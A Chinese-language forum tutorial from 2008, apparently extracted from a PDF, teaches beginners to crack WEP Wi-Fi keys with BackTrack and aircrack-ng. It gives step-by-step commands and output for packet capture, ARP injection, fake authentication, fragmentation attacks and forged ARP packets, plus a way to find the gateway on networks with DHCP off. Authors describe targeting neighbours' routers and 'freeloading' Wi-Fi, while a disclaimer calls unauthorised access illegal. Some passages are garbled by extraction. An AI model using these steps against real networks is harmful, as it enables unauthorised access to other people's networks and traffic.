BackTrack使用全解_WEP破解篇V1.0 by huangzhaohui

VIEWS: 6,104 PAGES: 72

									 

 

 

 

 

 

2008 2 8 
 
WEP 破解 V   解篇  V1.0

策划:Tange   Zero  策 e 

Anyw where WLAN!! 

I 

 

 

 

目录 
前言 ........................................................................................................................................... 1  第一章  WEP 破解 ............................................................................................................... 2 

一、准备工作 ............................................................................................................................3   二、自动化破解工具 SpoonWEP 和 SpoonWEP2  ...................................................................3   . 三、手动破解 ......................................................................................................................... 13  第二章  WEP 破解进阶 .......................................................................................................... 18  一、无客户端破解 ................................................................................................................. 19  二、DHCP 关闭 ....................................................................................................................... 31  四、MAC 过滤 ........................................................................................................................ 37  五、SSID 有关 ......................................................................................................................... 41  六、破解路由器密码 ............................................................................................................. 48  第三章    WEP 破解技巧与常见问题整理  ............................................................................ 50  . 第四章    破解命令全解 ......................................................................................................... 51  一、  二、 
   

破解所涉及命令的参数的说明及常用说明 ............................................................ 52  aireplay 详述 .............................................................................................................. 67 

Anywhere WLAN!! 

 

II 

   

 

 

前言 
无线网络的破解随着 BackTrack 的出世而不断普及,使得破解可让普通用户轻易言之,无线 网络的安全也正获得越来越多人的重视。    对于毫无经验的菜鸟,如何破解 WEP 或 WPA,在论坛上浏览往往无从下手,遍地都是破解 的经验、方法,而系统性的操作需要菜鸟花费不少时间去潜水学习,用户对 Anywlan 论坛服 务的感受也差强人意。    本文针对菜鸟使用 BackTrack 3 破解无线网络,尽量使用通俗易懂的语言解释从 BT 的安装、 汉化、破解的每一步骤的系统性方法,通过系统地建立菜鸟对破解的认知,来获得用户对 Anywlan 服务的认同和支持。但方法是相对的,请朋友们切记任何方法都有可能在使用中遇 到问题而阻止不前, 也可能因您的一个想法而获得更大的改进, 系统方法仅提供给您一个理 论性的改善和提高能力的路径,而您——是破解的主角,动手 DIY 是最有效的路径,思考是 最有效的方法。无论成功与失败,Anywlan 论坛都欢迎您来交流经验。    本系列邀请了论坛各位高手,感谢他们在繁忙之余所给予的指导。    Anywlan 致力于无线网络的普及,任何未经授权的访问都是非法的,本文仅用于学习交流, 请勿用于任何非法行为!请在下载后 24 小时内删除。  欢迎各位菜鸟、老鸟指正本文错误及提出本文的改进意见,请到无线论坛 (http://www.anywlan.com/bbs)提出和交流经验,使大家共同提高安全技术水平。    欢迎转载,未经本站允许不得修改本文及删除 Anywlan 标识!  不得利用本文进行一切商业行为,否则由其承担一切后果。    购买设备淘宝店:http://shop33889440.taobao.com/,欢迎惠顾。             

Anywhere WLAN!! 

 

1 

 

 

中国无线门户 

                 

第一章 WEP 破解 
     

Anywhere WLAN!! 

 

2 

 

 

中国无线门户 

BackTrack 破解 WEP 的方法有非常多,本章简单介绍两种。一种是按部就班操作命令来 进行破解, 可以获得很高的技术成就感及提高菜鸟的动手能力; 二是 BT3 提供的自动化 WEP 破解软件,可供快速破解。本文推荐菜鸟们学习第一种破解方式,一是有助于理解 WEP 的 脆弱性,二是获得动手的乐趣——破解 WEP 不是本文最终目的,而是引导大家享受技术过 程。  本文很难综合所有破解文章,更多的文章请查看——  无线安全及破解技术资源总帖:http://www.anywlan.com/bbs/viewthread.php?tid=8404   

一、准备工作 
1.网卡  BT3 挑剔网卡,不是所有网卡都能支持破解。请查看网卡支持列表: http://www.anywlan.com/bbs/viewthread.php?tid=10710  汉化版:http://www.anywlan.com/bbs/viewthread.php?tid=11894  网卡是否支持 BT 取决于网卡的芯片,如果您的网卡芯片在上述列表中即能支持。    2.软件  软件使用 Backtrack,并按基础篇选择 U 盘、硬盘或光盘启动。 

二、自动化破解工具 SpoonWEP 和 SpoonWEP2 
编者注:BackTrack3 Final 提供自动破解工具 SpoonWEP(现最新为 SpoonWEP2) ,使用户告 别繁琐的命令。BT3 beta 及之前版本可到 http://www.anywlan.com/bbs 下载 SnoopWEP2 的 LZM 升级。我们建议新手按本章第三节的手动破解一文操作,以便理解 WEP 破解的原理。    SpoonWEP2 改进了软件操作,使之更傻瓜化、简单,比如将扫描 AP 的命令功能集成等。  SpoonWEP2 需要到论坛下载 spoonwep2.lzm 文件并手工更新。 BT3 Beta 及之前的版本没有提 供 SpoonWEP,可下载相关的 LZM 手工添加进去。详细操作方法请参阅上篇——《BackTrack 基础安装篇》第四章《BackTrack 高级应用》的第一节《给 BT 添加 LZM 文件》 。    (一) 使用 SpoonWEP 破解    撰文:风云 007  原址:http://www.anywlan.com/bbs/viewthread.php?tid=12959    环境:Vmware  网卡:Linksys WUSB54G v4  使用 spoonWEP 之前需要先获取所破解 AP 的 MAC 地址,如有客户端 MAC 可迅速提高破解 时间。 

Anywhere WLAN!! 

 

3 

 

 

中国无线门户 

 
Anywhere WLAN!!    4 

 

 

中国无线门户 

 

 
Anywhere WLAN!!    5 

 

 

中国无线门户 

 

 

Anywhere WLAN!! 

 

6 

 

 

中国无线门户 

 

 

Anywhere WLAN!! 

 

7 

 

 

中国无线门户 

 

 

Anywhere WLAN!! 

 

8 

 

 

中国无线门户 

 

     
   

Anywhere WLAN!! 

 

9 

 

 

中国无线门户 

(二) 使用 SpoonWEP2 破解  撰文:风云 007  原址:http://www.anywlan.com/bbs/viewthread.php?tid=12959   

 

 
Anywhere WLAN!!    10 

 

 

中国无线门户 

   

 
Anywhere WLAN!!    11 

 

 

中国无线门户 

   

   

Anywhere WLAN!! 

 

12 

 

 

中国无线门户 

 

 
 

三、手动破解 
原文:BackTrack2 下破解 WEP 加密实战讲解  原址:http://www.anywlan.com/bbs/viewthread.php?tid=5876  作者:Christopher Yang [ZerOne](Longas)  编者注:针对新手对原文有部分修改。    首先进入 BT3 的图形界面。  打开一个 Shell, 如下图, 输入 ifconfig ‐a  察看当前网卡。 新手要注意此命令是 ifconfig, 而不是 windows 的 Ipconfig。Ifconifg 后面加一个空格后用‐a 参数。  这里我就使用 USB 网卡为例,可以看到有一个名为 rausb0 的网卡,状态是未载入,这 里输入 ifconfig    ‐a    rausb0    up 来载入 USB 网卡驱动,见下图:  注:rausb0 是您的网卡在 BT 下的标识,名称会由于网卡不同显示也会不同,凡下面出 现 rausb0 的字符都应改换成您在此看到的网卡标识。   

Anywhere WLAN!! 

 

13 

 

 

中国无线门户 

    下来,我们可以使用如 Kismet、Airosnort 等工具来扫描当前无线网络的 AP,如下图, 这里我用了 airsnort,找到了一个,可以看到,是有 WEP 加密的,记下它的 MAC 和频道, 就是 channel。   

    然后,我们需要将网卡激活成 monitor 模式,才可以进行后续的破解,命令如下:  airmon‐ng    start    rausb0    6,这里这个 6 就是刚才我们发现的 AP 的频道,可以不输入,但 输入会提高精确度。  然后输入下列命令开始抓包  airodump‐ng    ‐w    ciw.cap    ‐‐channel    6    rausb0  , 这里 ciw.cap 就是我设置的抓包文件名, cap 文件名自已任意设置。回车后如下图   

Anywhere WLAN!! 

 

14 

 

 

中国无线门户 

    这里为了加快 IVs 的获取,可以进行 ArpRequest 注入式攻击,这个很重要,实际入侵都 会用到,可以有效提高抓包数量及破解速度,命令如下图  aireplay‐ng ‐3 ‐b AP's MAC ‐h Client's MAC ‐x 1024 rausb0  解释一下:‐3 指的是采取 ArpRequest 注入攻击方式,‐b 后面跟上要入侵的 AP 的 MAC 地址, 可以不用, ‐h 但用了效果会更好, 这个后面跟的是监测到的客户端 MAC 地址, ‐x 1024 指的是定义每秒发送数据包数量,这个值可以小一些,但最高 1024 就可以了,嘿嘿,若你 不怕网卡在攻击时出现卡死的状态,你可以设为 4096 试试,最后是指定 USB 无线网卡,如 下图, (需要说明的是可能开始会没有反应,但只要捕获到请求包,就会加快注入的)  编者注: 每秒发送数据包数量建议自已测试。 不是越高越好, 有时低点反而能更快获取 Data。 能否注入取决于您的网卡,不是所有无线网卡都能支持注入。 

Anywhere WLAN!! 

 

15 

 

 

中国无线门户 

  然后,就可以同步开启 aircrack‐ng 来进行同步破解了,命令如下:  aircrack‐ng    ‐x    ‐f    2    ciw.cap 这里‐x 是暴力破解模式,‐f 指的是复杂度为 2  ,后面是我们 即时保存的那个抓包文件,回车后就可看到下图了。  请注意,破解时间取决于注入封包数量,网卡支持度,内存及 CPU 等,主要是前两者。  下图为 64 位 WEP 加密破解成功后界面 

    下图为 128 位 WEP 加密破解成功后界面 
  16 

Anywhere WLAN!! 

 

 

中国无线门户 

 

    好了,各位,看完了,就去试验吧! !       

Anywhere WLAN!! 

 

17 

 

 

中国无线门户 

                           

第二章  WEP 破解进阶 
   

Anywhere WLAN!! 

 

18 

 

 

中国无线门户 

 

一、无客户端破解 
(一) BT2、BT3 下破解无客户端 wep    原文:BT2、BT3 下破解无客户端 wep  原址:http://www.anywlan.com/bbs/viewthread.php?tid=7457  作者:liyg  编者注:原文是在 BT2 下的使用方法,我们使用 BT3 时直接跳过 Aircrack 升级过程,这里已 经去掉。    装备:  dell D410 笔记本、linksys wusb54g v4  (加装 12db  八木定向天线) 、bt2 usb  系统    1.  升级 Aircrack。使用 BT3 省去这一步。  2.输入 ifconfig  –a  查看网卡  (顺便记下自己网卡的 mac,后面要用到)  我的网卡是 rausb0    再输入 ifconfig  –a rausb0 up  加载 usb 网卡驱动  3.输入 airmon‐ng start rausb0 6  激活网卡的 Monitor 模式  后面的 6  是你要破解 ap 的工作频道, 根据实际, 换成你破解的 ap 的实际工作频道 (下同) 。 

  4.输入抓包命令,抓包并查看你要破解的 ap 的 essid  和  mac  输入命令  airodump‐ng ‐‐ivs ‐w name ‐c 6 rausb0  , 其中, rausb0 是你破解用的网卡接口名 (下 同) ,这样,你的窗口将显示一个工作站,可以看到你要破解的 ap 的 essid  和 mac  ,并记 下 ap 的 essid  和 mac。 

Anywhere WLAN!! 

 

19 

 

 

中国无线门户 

  5.上面窗口不关闭,另开一个窗口,输入命令,用自己的网卡连接要破解的 ap  输入  aireplay‐ng ‐1 0 ‐e ap 的 essid ‐a ap 的 mac ‐h  自己网卡的 mac rausb0  这时,系统将回显  Sending Authentication Request  Authentication successful  Sending Association Request  Association successful :‐)   

  6.输入 aireplay‐ng ‐5 ‐b ap 的 mac    ‐h  自己网卡的 mac rausb0  来获得 xor 文件  如果一切顺利,系统将回显  Use this packet ?  输入 y  回车  再输入 ls  查看当前目录,你将看到刚才生成的一个后缀名为 xor 的文件。 

Anywhere WLAN!! 

 

20 

 

 

中国无线门户 

 

   

Anywhere WLAN!! 

 

21 

 

中国无线 线门户 

  7 . 输 入 packetforge‐ng  ‐0 ‐a  ap 的 mac    ‐h  自 己 网 卡 的 mac  ‐k  25 0  55.255.255.25 ‐l 55  255 5.255.255.255    ‐y    fragm ment  ‐xxxx‐xx xxxxx.xor  ‐w  mrarp  其中 中,–l 中的 l 是 L 的小写,别 和 1 混淆,而其 其中的 xxxx‐x xxxx.xor  是你 你刚才生成的 的文件名    系统 统回显:Wrot te packet to: mrarp   

  8. ‐x 1024  是 输入 输 aireplay‐ ‐ng ‐2  –r mrarp ‐x 1024 rausb0  , 包攻击.其中, 发包 是限定发包速度, 避免 免网卡死机,我选择的是 512。  是
22 

Anyw where WLAN!! 

 

 

中国无线门户 

输入 y  回车  攻击开始。 

  这时,前面的抓包窗口上的 data 将迅速增加。 

  到数据增加到 3 万以上时,另开窗口,启动  aircrack‐ng ‐n 64 –b ap 的 mac name‐01.ivs 
  23 

Anywhere WLAN!! 

 

 

中国无线门户 

其中  64  是 64 位密码,如果是 128 位,换成 128 即可。 

   

    我个人感觉,bt2(u 盘启动)对 pc 卡  、pcm 卡支持不怎么好——我一块声宝 la4111、 一块神脑 2511 大功率无线网卡都不支持发包攻击,最终的成功来源于 linksys wusb54g v4  。   使用该卡破解,两点需要注意:  一是该卡的天线和发射功率都比较次,对较弱的信号,需要对网卡天线进行改造(具体参考 坛子上的改造方式,我用的是 12db 的八木定向天线) ,否则无法发包。 
  24 

Anywhere WLAN!! 

 

 

中国无线门户 

二是  由于该卡功率有限,在发包攻击时,最好限定发包数量,否则容易发生网卡发热,出 现“死卡”现象。具体是:  在破解有客户端时,发包命令  aireplay‐ng ‐3 ‐b  路由 mac ‐h  客户 mac rausb0  在该命令中加 入  ‐x  参数, 限定发包速度。 我用的是 1024  ,   甚至 512  。 具体的命令为 aireplay‐ng ‐3 ‐b  路 由 mac ‐h  客户 mac ‐x 512 rsusb0    而在破解无客户端时, 发包命令  aireplay‐ng ‐2  –r arp rausb0  中间同样插入参数  ‐x 1024  或  ‐x 512  我选择的是  aireplay‐ng ‐2  –r arp ‐x 512 rausb0  。    相比之下, 无需升级, bt3 即可进行操作。 相信 bt3 还有更多功能,   请大侠们继续研究开发。    (二) 如何破解没有客户端连接的 wep 密码  原文:如何破解没有客户端连接的 wep 密码(本文为 2007 年 Anywlan 原创 A 级文章)  原址:http://www.anywlan.com/bbs/viewthread.php?tid=6680  作者:haohamaru    本文使用的是 wifiway0.8, 请与 BT3 对比, 两者原理都是相通的。 wifiway 请到网站搜索下载。    写 在 前 面 的 话 : 前 面 在 论 坛 发 了 个 帖 子 《 分 享 成 功 的 快 乐 》( 地 址:http://www.anywlan.com/bbs/viewthread.php?tid=6619) ,看到很多朋友热心回帖,版主也 给了奖励,心中煞是感动,我在破解过程的很多问题都是在 anywlan 论坛得到解决的,也总 想着如何回报论坛,回报论坛上的朋友,这次把我破解无客户端连接的 AP 的经验发出来供 大家分享交流,参加论坛的征文比赛。 (我对奖品 AP 和增益天线直流口水,这可是蹭网利 器啊,呵呵)同时也希望这篇文章能起到抛砖引玉的效果,论坛有越来越多的好帖子出现, 大家一起进步!  论坛上关于破解 wep 密码的教程已经很多,其工作原理是用 aircrack‐ng 工具包通过收 集合法客户端上网时产生的大量数据包来进行破解,但是这个破解是建立在目标 AP 有活动 客户端连接的基础上的,如果没有客户端或是客户端没有上网就会无法收集到足够的 ivs 数 据,很多朋友在实验的时候失败的原因就是因为这个。本文旨在讨论破解无客户端连接的 wep 密码,毕竟现实生活中存在这样的情况的(比如我所在的小区物业管理公司,晚上时经 常路由、猫没关,但是没人上网) 。从而达到只要对方路由开着,无论有无客户端,客户端 有无上网,你都能破解的效果。  阅读本文需要一定的无线知识, 请你先学习下论坛的扫盲帖, 笔者也是一步步在论坛从 菜鸟学习至今的,在这里再次感谢 anywlan 论坛,衷心希望论坛越办越好!  由于在 wifiway0.8 下未找到抓图工具,因此以下所列所有的系统反馈消息都是我在 wifiway 下用文本编辑工具从终端窗口下 copy&paste 下来的,可能占用篇幅比较大,也不够 直观,影响了大家的阅读(笔者注:同时也加大了我的工作量,还是老话说的好:工欲善其 事,必先利其器,呵呵)请大家见谅,论坛 linux 的高手请告诉我个抓图工具,我争取能抓 图给大家,这样将更明了。  请论坛朋友注意:为使大家能一目了然,以下段落中蓝色文字为输入的命令,红色部分 为提请大家要特别注意的地方,褐色部分为系统反馈的消息。  一、实验环境 
Anywhere WLAN!!    25 

 

 

中国无线门户 

软件:操作系统(OS) :wifiway0.8,工具:aircrack‐ng(wifiway0.8 自带,version:0.91)   硬件:dell640M,无线网卡:intel3945,mac:00:18:de:81:61:95  实验 AP:贝尔金 7231‐4p,mac:00:90:96:00:00:01,工作频道 6,essid:MyEHome(请 注意大小写),已使用 128 位 WEP 加密。  二、实验方案  1、设置无线网卡 MAC 地址。  2、设置网卡为在指定的 ap 的工作频道的监控模式。  3、使用 aireplay‐ng 在实验 AP 上产生虚假认证(fake authentication) 。  4、使用 fragmentation attack 来获得 PRGA。  5、使用上一步获得的 PRGA 用 packetforge‐ng 工具来生成一个 arp 包。  6、用 airodump‐ng 来收集需要的 IVS 数据  7、使用第四步得到的 arp 来注入攻击  8、用 aircrack‐ng 破解  三:详细步骤  一、设置无线网卡 mac 地址  这一步你也可以省略,因为 mac 地址比较难记,所以可以用 macchanger 将网卡的 mac 设置为一个好记的地址, 方便后面使用。 打开一个终端窗口输入: wifiway:~#macchanger ‐‐mac  wifi0  00:11:22:33:44:55(注意 wifi0 为我电脑无线网卡的接口名,你需要将其换为自己网卡 的接口名,请使用 iwconfig 查看)  二、设置网卡为在指定的 ap 的工作频道的监控模式。  由于我的 ap 是工作在频道 6 上的 (可以使用 kismet 等工具查看) 因此使用以下命令:  , airmon‐ng start wifi0 6 使网卡监听频道 6  这样网卡将启动监听模式,系统将反馈(mode monitor enabled)  你可用 iwconfig 来确认网卡监听模式已启动。  这一步相信大家都会,我就不详细讲解了,如果你有疑问,可以 PM 我或是查阅论坛以 前的帖子。  三、使用 aireplay‐ng 来获得 PRGA。  这是非常关键的一步。为让 AP 接受数据包,你必须使网卡和 AP 关联。如果没有关联 的 话 , 目 标 AP 将 忽 略 所 有 从 你 网 卡 发 送 的 数 据 包 , 并 发 送 回 一 个 未 认 证 消 息 (DeAuthentication packet) ,IVS 数据将不会产生从而导致无法破解。在终端窗口下输入:  wifiway:~# aireplay‐ng ‐1 0 ‐e MyEHome ‐a 00:90:96:00:00:01 ‐h 00:11:22:33:44:55 wifi0  参数解释:  ‐1  告诉 aireplay 使用 fake authentication(虚假认证)  ‐e essid  告诉 aireplay 目标 AP 的 essid,这里是 MyEHome  ‐a bssid  告诉 aireplay 目标 AP 的 bssid 号,这里是 00:90:96:00:00:01。  ‐h Mac  告诉 aireplay 我的网卡的 mac 地址, 这里是我在第一步设置的 00:11:22:33:44:55  Wifi0 为网卡接口名,请注意换成自己的。  该命令如果成功,系统将显示:  20:22:20 Sending Authentication Request(前面的是时间)
Anywhere WLAN!!    26 

 

 

中国无线门户 

20:22:20 Authentication successful 20:22:20 Sending Association Request 20:22:20 Association successful :-) 如果不能成功,系统可能显示:  20:28:02 Sending Authentication Request 20:28:02 Authentication successful 20:28:02 Sending Association Request 20:28:02 Association successful :-) 20:28:02 Got a deauthentication packet! 20:28:05 Sending Authentication Request 20:28:05 Authentication successful 20:28:05 Sending Association Request 20:28:10 Sending Authentication Request 20:28:10 Authentication successful 20:28:10 Sending Association Request 不能成功的原因很多,具体有如下几种:  1、目标 AP 做了 MAC 地址过滤  2、你离目标 AP 物理距离太远  3、对方使用了 WPA 加密  4、网卡不支持注入  5、网卡、AP 可能不兼容,网卡没有使用和 AP 一样的工作频道  6、输入的 ssid 拼写有误,请注意检查  以下为没有成功时系统列出的可能失败原因:  Attack was unsuccessful. Possible reasons: * Perhaps MAC address filtering is enabled. * Check that the BSSID (-a option) is correct. * Try to change the number of packets (-o option). * The driver hasn't been patched for injection. * This attack sometimes fails against some APs. * The card is not on the same channel as the AP. * Injection is not supported AT ALL on HermesI,Centrino, ndiswrapper and a few others chipsets. * You're too far from the AP. Get closer, or lower the transmit rate (iwconfig <iface> rate 1M). 你可以根据命令反馈消息来判断原因来尝试解决问题,比如获得一个合法的 MAC 并伪 造 MAC、使用‐o 参数设置发送包的个数、设置网卡到一个较低的 rate、到离目标 AP 更近一 点的地方^_^, 但是请注意: 如果这一步不能成功, 下面的步骤请不要再尝试, 都是无用功!  可以使用命令 tcpdump 来确认网卡是否已经连接到目标 AP 上  tcpdump -n -e -s0 -vvv -i wifi0
Anywhere WLAN!!    27 

 

 

中国无线门户 

如果没连接成功,AP 会反馈网卡告诉其未连接,这意味着 AP 会忽略所有来自你网卡的 注入包,破解不会成功。  成功的话则显示:  tcpdump: WARNING: wifi0: no IPv4 address assigned tcpdump: listening on wifi0, link-type IEEE802_11 (802.11), capture size 65535 bytes 21:19:26.467114 ESS CH: 6, PRIVACY ……(等一系列包信息) 21:19:27.388775 ESS CH: 6, PRIVACY 21:19:29.129776 ESS CH: 6, PRIVACY 29 packets captured 29 packets received by filter 0 packets dropped by kernel 注意最后三行文字,请按 ctrl+c 来结束 tcpdump 进程。  4、使用 fragmentation attack 来获得 PRGA(pseudo random genration algorithm)  这里的 PRGA 并不是 wep key 数据,并不能用来解密数据包,而是用它来产生一个新的 数 据 包 以 便 我 们 在 后 面 的 步 骤 中 进 行 注 入 。 输 入 命 令 :wifiway:~#  aireplay‐ng  ‐5  ‐b  00:90:96:00:00:01 ‐h 00:11:22:33:44:55 wifi0  ‐5  告诉 aireplay‐ng  使用 fragmentation attack 模式  ‐b,‐h  ,wifi0 就不用再解释了吧,呵呵。  系统将显示: 21:20:46 Waiting for a data packet... Size: 78, FromDS: 1, ToDS: 0 (WEP) BSSID = Dest. MAC 0x0000: 0x0010: 0x0020: 0x0030: 0x0040: 00:90:96:00:00:01 = 01:80:C2:00:00:00 0842 0000 0180 c200 0000 0090 9600 0001 .B.............. 0090 9600 0001 b013 b66d a100 fbd7 4289 .........m....B. d814 0d6c 9570 c61a 0d38 3034 dc48 3e9f ...l.p...804.H>. 273d 2fed c2b7 0991 2557 5c32 aae1 a2fd '=/.....%W\2.... 855a 3bbb 5f7f 74ae 1850 2503 bd2f .Z;._.t..P%../ 0us BSSID:00:90:96:00:00:01 DA:ff:ff:ff:ff:ff:ff SA:00:90:96:00:00:01 Beacon (MyEHome) [1.0* 2.0* 5.5* 11.0* 18.0 24.0 36.0 54.0 Mbit] 0us BSSID:00:90:96:00:00:01 DA:ff:ff:ff:ff:ff:ff SA:00:90:96:00:00:01 Beacon (MyEHome) [1.0* 2.0* 5.5* 11.0* 18.0 24.0 36.0 54.0 Mbit] 0us BSSID:00:90:96:00:00:01 DA:ff:ff:ff:ff:ff:ff SA:00:90:96:00:00:01 Beacon (MyEHome) [1.0* 2.0* 5.5* 11.0* 18.0 24.0 36.0 54.0 Mbit]

Source MAC = 00:90:96:00:00:01

Use this packet ? y(在这里请输入 y 表示使用这个包)

Anywhere WLAN!! 

 

28 

 

 

中国无线门户 

Saving chosen packet in replay_src-1104-212046.cap(保存了一个 cap 文件,但并不 能用来破解) 21:20:55 Data packet found! 21:20:55 Sending fragmented packet 21:20:55 Got RELAYED packet!! 21:20:55 Thats our ARP packet! 21:20:55 Trying to get 384 bytes of a keystream 21:20:55 Got RELAYED packet!! 21:20:55 Thats our ARP packet! 21:20:55 Trying to get 1500 bytes of a keystream 21:20:55 Got RELAYED packet!! 21:20:55 Thats our ARP packet! Saving keystream in fragment-1104-212055.xor(生成了一个 xor 文件) Now you can build a packet with packetforge-ng out of that 1500 bytes keystream 这一步生成的 xor 文件将被我们用来产生 arp 数据包,如果你选的包不成功,请多试几 次。  5、使用 packetforge‐ng 来产生一个 arp 包  在第 4 步中我们得到了 PRGA,我们可以利用这个 PRGA 来产生一个注入包,其工作原 理就是使目标 AP 重新广播包,当 AP 重广播时,一个新的 IVS 将产生,我们就是利用这个来 破解。现在,我们生成一个注入包。首先输入:wifiway:~# ls(linux 下查看当前目录的命令)  Desktop fragment-1104-212055.xor 接着输入: wifiway:~# packetforge-ng -0 -a 00:90:96:00:00:01 -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y fragment-1104-212055.xor -w arp -0 告诉 packetforge-ng 来产生一个 arp 包 -k 是目标 IP(绝大部分 AP 都会对 255.255.255.255 进行应答) -l 是源 IP(绝大部分 AP 都会对 255.255.255.255 进行应答) -y (filename)是用来读取 PRGA 的文件 -w (filename)将 arp 包写入文件,我用的文件名是 arp 系统回显:Wrote packet to: arp 这一步我们生成了一个 arp 包文件,使用 ls 命令查看: wifiway:~# ls Desktop arp fragment-1104-212055.xor replay_src-1104-212046.cap 6:启动 airodump-ng 新开一个终端窗口来捕捉 ivs,输入命令: wifiway:~# airodump-ng -c 6 --bssid 00:90:96:00:00:01 -w capture wifi0(参数我就 不解释了,相信大家都知道,-w 是生成的文件,这里是 capture) 系统回显:
Anywhere WLAN!!    29 

replay_src-1104-212046.cap

可以看见当前有一个 fragment-1104-212055.xor(是上一步生成的)

 

 

中国无线门户 

CH 6 ][ Elapsed: 13 s ][ 2007-11-04 21:24 BSSID 00:90:96:00:00:01 BSSID 7、注入 ARP 包 新开一个终端窗口,输入命令: wifiway:~#aireplay-ng -2 –r arp wifi0 -2 使用交互模式 -r rap 从文件中读入 arp 包 Wifi0 是网卡接口 输入后,切换到 airodump-ng 窗口,我们惊喜的发现,出现工作站窗口了,哈哈,大功告 成,只差最后一步了,以下是我的系统回显: CH 6 ][ Elapsed: 24 s ][ 2007-11-04 21:11 BSSID 00:90:96:00:00:01 BSSID PWR RXQ -1 100 STATION Beacons 266 #Data, #/s CH MB 5513 279 PWR -1 6 48 ENC CIPHER AUTH ES WEP WEP M PWR RXQ -1 100 STATION Beacons 157 PWR #Data, #/s CH MB 9 0 6 48 ENC CIPHER AUTH ES WEP WEP M

Lost Packets Probes

这里我们可以看到没有工作站,也就是没有客户端连接时 airodump 会如此显示。

Lost Packets Probes 0 5515

00:90:96:00:00:01 00:11:22:33:44:55 的朋友知道出现客户端意味着什么吧^_^

注意加方框的红字部分, 可以看到我们的 00:11:22:33:44:55 已成功连接, 有过破解经验 PS:如果 BSSID data 没有增长,请回到第三步用 tcpdump 确认网卡是否和 AP 相关联。 8、使用 aircrack-ng 来破解 在当前终端窗口中输入 wifiway:~#ls 系统显示: Desktop capture-01.cap arp fragment-1104-212055.xor replay_src-1104-212321.cap capture-01.txt replay_src-1104-212046.cap

我们就使用这个 capture-01.cap 来破解(上一步中 airodump-ng 生成),输入命令: wifiway:~# aircrack-ng -z -b 00:90:96:00:00:01 capture-01.cap Opening capture-01.cap Read 49902 packets. Attack will be restarted every 5000 captured ivs. Starting PTW attack with 16553 ivs.
Anywhere WLAN!!    30 

 

 

中国无线门户 

Aircrack-ng 0.9.1 r634 [00:01:32] Tested 1117800/1400000 keys (got 47366 IVs) KB 0 1 2 3 4 5 6 7 8 9 10 11 12 depth 0/ 15 0/ 1 0/ 1 0/ 3 0/ 1 0/ 3 0/ 1 0/ 1 0/ 1 0/ 5 0/ 9 18/ 23 5/ 8 byte(vote) A1( 219) C7( 212) 85( 210) 40( 209) 5B( 208) BF( 208) 7E( 243) 59( 217) 37( 212) 85( 211) 74( 209) 7E( 207) E2( 262) 38( 209) 6D( 205) F0( 204) 12( 201) EF( 201) 50( 230) 44( 211) 4A( 210) 80( 207) DB( 207) 17( 205) 12( 264) E7( 214) 33( 211) 4C( 206) 2C( 205) C0( 203) 11( 233) CC( 221) 49( 213) 01( 208) 14( 207) 5C( 205) F0( 240) 9C( 215) E5( 212) F9( 208) 22( 207) 67( 206) 67( 226) 90( 205) 17( 204) 48( 203) 6F( 203) 71( 200) 62( 233) 94( 212) AC( 204) 8C( 202) BE( 202) E2( 202) E6( 226) 3A( 223) 40( 208) EA( 206) 20( 206) 7E( 204) 2E( 223) 53( 219) 20( 210) 0E( 206) 9E( 206) D8( 205) 6D( 197) 5B( 196) 98( 196) DE( 196) E1( 196) 23( 195) 8F( 205) B5( 204) 1E( 204) 77( 202) 76( 200) 7E( 200)

KEY FOUND! [ A1:7E:E2:50:12:11:F0:67:62:E6:2E:A0:8F ] Decrypted correctly: 100% Bingo!至此,大功告成!得到 key 后的事情我不说相信大家也知道怎么用了吧,呵呵。 四、其他需要补充的事项 一、以上所有使用的命令,都可以在 linux 环境下使用--help 命令或是使用 man xx 命 令获得在线帮助,如 aireplay-ng –help, man aireplay-ng,阅读该信息能给你极大的帮助, 笔者想说的是学习 linux 将加快你的破解过程,毕竟大部分 hacker tools 在 linux 下有更 好的支持,本人就是在恶补了一个星期的 linux 后对破解有了新的认识。 二、使用 backtrack livecd 也能像以上操作,不过我的 IPW3945 在 BT2 下工作不是很正 常,所以我是用 wifiway 来讲解的,你也可以用 BT2 来进行实验,另外,BT2 自带的 aircrack-ng 好像是 0.7 版本,请先升级后再使用。 3、本教程不适合破解 WPA‐PSK 加密方式,破解 WPA‐PSK 请参阅 longas 的帖子。   

二、DHCP 关闭 
(一) 方法 1: 
原文:我的 WAR‐Drive 经历  (本文为 2007 年 Anywlan 原创奖励唯一 A+作品)  原址:http://www.anywlan.com/bbs/viewthread.php?tid=7503  作者:Visge   
Anywhere WLAN!!    31 

 

 

中国无线门户 

通常情况是 WLAN 使用者修改了默认 IP,且修改了管理员密码。这时你就需要借助 Airopeek 或 OmniPeek 的帮助找到路由的 IP 地址。运行 OmniPeek,选择 OmniPeek 所支持的 无线网卡(注意红色的下划线,只有当 wildpackets  API 为 Yes 时,才是被 OmniPeek 所支持 的网卡) ,在 802.11 选项中选择 scan 模式(下图红色的框) ,勾选所有信道,再点击确定, 开始嗅探数据包。抓了一阵包后,在专家模式下查看是否有 SSDP 协议的数据包。如果有 IP 向 230.255.255.250 这个组播地址发送 SSDP 消息(蓝色复选部分为 SSDP 包) ,那么恭喜你赶 快双击该包,查看该包具体内容。如果内容如下: 

   

     

 

Anywhere WLAN!! 

 

32 

 

 

中国无线门户 

 

   

   

Anywhere WLAN!! 

 

33 

 

 

中国无线门户 

    恭喜你,这个 IP 就是你所需要的网关地址。从抓包结果可以清楚地看到,该报文是 TP‐LINK 的无线路由器发出的,地址为 192.168.1.1,路由器型号为 WR541G,设备类型是 InternetGate 且状态是 alive。接下来你需要做的无非是将自己的无线网卡改到该 IP 段,将网 关地址填上 192.168.1.1,DNS 填上当地 ISP 提供的 DNS,再点击确定。你再打开浏览器随便 输入一个网址,看看是否能够正常上网了呢?答案是肯定的。  为什么查看 SSDP 数据包就可以查到网关地址呢?首先看看什么是 SSDP 消息,SSDP 就 是 Simple Service Discovery Protocol 简单服务发现协议) ( ,这个协议是属于 UPNP 多个协议中 的一种, 那什么又是 UPNP 呢?相信用过 BT 下载的同志都见过, UPNP  体系面向无线设备、 PC 机和智能应用提供普遍的对等网络连接,在家用信息设备、办公用网络设备之间提供无 缝的 TCP/IP 连接和 web 访问功能。大多数的傻瓜路由器都被当做  UPNP 的设备,而该 WLAN 使用的的 TP‐LINK WR541G 正是这类傻瓜路由器。WR541G 在 默认情况下是把 UPNP 的发现服务打开的, 所以它在 WLAN 中会以固定的频率发送组播 SSDP 消息,来告知 WLAN 中的设备存在这么一个 UPNP 设备!于是简单的抓包后就可以判断出网 关的地址,这样就突破了 LAN 中的对外连接限制! 

(二) 方法 2: 
